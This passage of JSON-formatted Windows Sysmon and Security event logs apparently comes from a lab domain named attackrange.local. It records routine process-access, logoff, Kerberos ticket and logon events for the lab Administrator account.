b09|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a6fc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a425|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a0f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+df42b50b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de960f57|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de960527","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-00103DF60600}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-00103DF60600}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220472,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x673FC\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x673fc","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220473,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68A42\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x68a42","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220474,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68F28\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x68f28","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220475,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220476,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220477,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220478,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D830\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such 